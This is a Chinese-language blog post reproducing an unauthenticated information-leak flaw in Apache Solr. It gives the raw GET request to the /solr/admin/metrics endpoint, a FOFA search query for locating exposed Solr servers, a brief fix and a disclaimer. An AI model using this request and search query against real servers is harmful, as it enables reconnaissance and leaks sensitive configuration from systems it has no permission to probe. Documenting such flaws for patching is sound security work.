【复现】Apache Solr信息泄漏漏洞_24

最新推荐文章于 2024-06-02 15:58:33 发布
最新推荐文章于 2024-06-02 15:58:33 发布
阅读量1k 收藏 9
点赞数 18
分类专栏: 安全漏洞 文章标签: 安全 系统安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fushuang333/article/details/135721311
版权

目录

一.概述

二 .漏洞影响

三.漏洞复现

1. 漏洞一:

四.修复建议:

五. 搜索语法:

六.免责声明

一.概述

Apache Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

二 .漏洞影响

未授权导致一些敏感配置信息泄露,可能造成危害

三.漏洞复现

1. 漏洞一:

(1)漏洞类型:  信息泄露

(2)请求类型:GET

(3)复现

找到相关系统

请求漏洞点,查看burp响应

请求包

GET /solr/admin/metrics HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Te: trailers

四.修复建议:

改为禁止访问或删除

五. 搜索语法:

1.fofa

app="APACHE-Solr"

六.免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

穿着白衣
关注
  • 18
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Solr 信息泄漏漏洞(含批量验证poc)
weixin_43567873的博客
04-03 62
Apache Solr 信息泄漏漏洞(含批量验证poc)
Apache Solr漏洞复现汇总
千寻的博客
03-31 1914
Apache Solr漏洞复现汇总
Apache Solr 信息泄漏漏洞(含批量验证poc)_apache solr信息泄露
2401_84411018的博客
04-17 320
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Apache Solr  SSRF漏洞
U_U520的博客
03-20 286
ApacheSolr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器,使用Java语言开发,主要基于http和Apache Lucene实现的,该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。三:得到了数据库名之后,我们可以通过修改数据库的配置来开启RemoteStreaming 获取数据。攻击者可以传递特定参数,使服务端发起请求,成功利用该漏洞可造成内网信息探测。CVE-2021-27905 服务端请求伪造漏洞。-d 用于发送post请求的数据体。
Apache Solr中数据备份文件未删导致数据库信息泄露
weixin_50464560的博客
04-01 237
今天挖到一个新洞,是涉及到Apache Solr的。去稍微了解了下,Apache SolrApache开发的一个开源的主要基于HTTP和Lucene的全文搜索服务器,这是一个开源的搜索服务,使用Java语言开发。 看了下版本,是5.3的,找了一下网上已经爆出的漏洞,几乎都在可用版本范围内。然后就先去扫了下端口,发现除了80和443,全都被过滤了,这里就没有可利用的点。这里还不想放弃,既然来都来了,总得捞点东西走,便开始找有用的信息。最后经过不断的尝试,终于发现了里面有一份数据文件和一份数据的备份文件的存在
CVE-2021-44548 Apache Solr 敏感信息泄露漏洞分析及复现
蚁景网安学院
05-19 796
2021年12月18日,Apache发布安全公告,Apache Solr中存在一个信息泄露漏洞(CVE-2021-44548),该漏洞影响了8.11.1之前的所有Apache Solr版本(仅影响Windows平台)。Apache Solr的DataImportHandler中存在一个不正确的输入验证漏洞,可利用Windows UNC路径从Solr主机调用网络上的另一台主机的SMB服务,或导致SMB攻击。
框架漏洞-CVE复现-Apache Shiro+Apache Solr
xiaoheizi的博客
07-19 484
描述:Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。如果网站的功能是采用框架开发的,那么挖掘功能的漏洞就相当于在挖掘框架自身的漏洞。描述:Apache Shiro是一个强大且易用的Java安全框架,用于身份验证、授权、密码和会话管理。
Apache solr XML&RCE 漏洞(CVE-2017-12629)
weixin_44047654的博客
02-22 611
Apache Solr XXE & RCE 漏洞(CVE-2017-12629)
apache solr漏洞复现
Shanfenglan's blog
12-01 1483
文章目录1. 什么是Apache solr2. Apache solr rce CVE-2017-126292.1 利用3. Apache Solr 远程命令执行漏洞(CVE-2019-0193)3.1 利用4. Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)4.1 利用5. 任意文件读取参考文章 1. 什么是Apache solr Apache solr约等于ElecticSearch,是一个开源的搜索引擎。Solr 使用 Java 语言开发,主要基于 H
apache-solr-1.4.0.zip_apache-solr _apache-solr-1.4.0_apache-solr
09-20
solr1.4源码(欢迎喜欢研究solr的人下载)
Apache Solr 代码执行漏洞应急响应通告
05-05
Apache Solr 代码执行漏洞应急响应通告
ikanalyzer-solr8.4.0_solr8_solr_ikanalyzer_中文分词_
10-02
此为solr8的ikanalyzer中文分词包
solr服务器_solr_
10-02
solr
apache漏洞汇总apache漏洞汇总
03-29
Apache-flink 未授权访问...CVE-2019-0193 Apache-Solr via Velocity template RCE CVE-2019-17564 Apache-Dubbo反序列化漏洞 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 CVE-2020-13957 Apache Solr 未授权上传
语音控制系统的安全挑战与防御策略(下)
声纹感知 洞察芯声
05-29 1001
活性检测已成为VCS中一种普遍的防御策略,主要设计用来确定语音命令是否来自真实的人类。这种方法背后的基本前提是,大多数恶意命令都是机器生成的。这些命令通常通过扬声器播放或直接通过音频文件(如WAV文件)输入到VCS API中。与这些人工产生的命令不同,真正的人类用户不会以这种方式生成语音命令。因此,通过识别人类语音的特征,活性检测旨在过滤掉这些非人类、机器生成的输入,从而增强VCS的安全性。
Docker 安全及日志管理
最新发布
2301_77081516的博客
06-02 281
虚拟机通过添加 Hypervisor 层,虚拟出网卡、内存、CPU 等虚拟硬件,再在其上建立虚拟机,每个虚拟机都有自己的系统内核。而 Docker 容器则是通过隔离的方式,将文件系统、 进程、设备、网络等资源进行隔离,再对权限、CPU 资源等进行控制,最终让容器之间互不影响,容器无法影响宿主机。容器与宿主机共享内核、文件系统、硬件等资源。
内网安全之证书模版的管理
weixin_45910629的博客
05-29 1045
证书模板 Certificate templates 是 CA 证书颁发机构的一个组成部分,是证书策略中的重要元素,是用于证书注册、使用和管理的一组规则和格式。当 CA 收到对证书的请求时,必须对该请求应用一组规则和设置,以执行所请求的功能,例如证书颁发或更新。这些规则可以是简单的,也可以是复杂的,也可以适用于所有用户或特定的用户组。证书模板是在 CA 上配置并应用于传入证书请求的一组规则和设置。证书模板还向客户机提供了关于如何创建和提交有效的证书请求的说明。基于证书模板的证书只能由企业 CA 颁发。
掌控安全CTF-2024年5月擂台赛-WP(部分)
ASD830的博客
05-27 1126
如果实在没看到的话(或者扫不出来),可以放stegsolve里面看看,red plane 3,够清晰了吧哈哈哈。
solr5.0mysql_Apache Solr 安装部署及索引创建
06-10
好的,我可以为您介绍一下Solr 5.0与MySQL的整合,以及Solr的安装和索引创建。 首先,您需要下载Solr 5.0,Solr是一个开源搜索平台,可以帮助您创建强大的搜索应用程序。Solr可以运行在独立模式或分布式模式下,支持各种数据源,包括MySQL。 接下来,您需要安装Solr,可以参考Solr官方文档进行安装。安装完成后,您需要创建一个核(core),核是Solr的最小单位,用于存储索引数据。您可以通过Solr的管理界面或命令行工具来创建核。 一旦您创建了核,您就可以开始创建索引了。在使用Solr索引MySQL数据之前,您需要下载并安装Solr的DataImportHandler插件,这个插件用于将MySQL数据导入到Solr中。您可以在Solr官方网站上找到该插件的下载地址和安装说明。 安装完成后,您需要在Solr中配置DataImportHandler插件。您可以在Solr的配置文件中添加DataImportHandler的配置信息,例如MySQL数据库的连接信息、数据表信息等。一旦配置完成,您就可以使用DataImportHandler将MySQL中的数据导入到Solr中了。 最后,您可以使用Solr的查询接口进行搜索。Solr的查询接口提供了多种查询方式,包括关键字搜索、范围搜索、过滤查询等。您可以根据需求选择不同的查询方式,实现高效的搜索功能。 希望这些信息对您有所帮助。如果您有其他问题,请随时提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

穿着白衣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值